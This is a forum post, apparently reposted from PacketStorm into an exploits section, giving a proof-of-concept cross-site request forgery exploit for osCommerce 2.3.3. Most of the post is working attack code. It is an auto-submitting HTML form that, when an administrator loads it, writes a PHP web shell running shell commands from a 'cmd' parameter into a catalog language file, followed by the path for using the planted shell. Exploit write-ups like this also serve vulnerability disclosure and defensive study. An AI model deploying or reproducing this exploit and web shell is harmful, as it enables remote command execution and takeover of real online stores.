Jump to content
Praetorian503

osCommerce 2.3.3 Cross Site Request Forgery

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

osCommerce version 2.3.3 suffers from a cross site request forgery vulnerability.

<?php
        /*
         * this is simple proof-of-c0ncept for csrf in latest
osCommerce (2.3.3).
         *
         * Admin, after visiting this page, will add php-shell-code to file:
         * ./catalog/includes/languages/english/download.php, so now if we
         * add 'cmd' param to this file, our 'shell' will print command output.
         *
         * --- there should be more this kind of bugs in this webapp.
         * 22.o1.2o13 o/
        */
?>

<html><body onload="document.runCSRF.submit();">
<form method="post" name="runCSRF"
action="http://oscommerce-2.3.3/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">
<input type="hidden" name="file_contents"
value="<?php $cmd = $_GET['cmd']; echo '<pre>' . shell_exec($cmd) . '</pre>'; ?>">

</form>your shell should be here:
catalog/includes/languages/english/download.php?cmd=id<br></body></html>

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...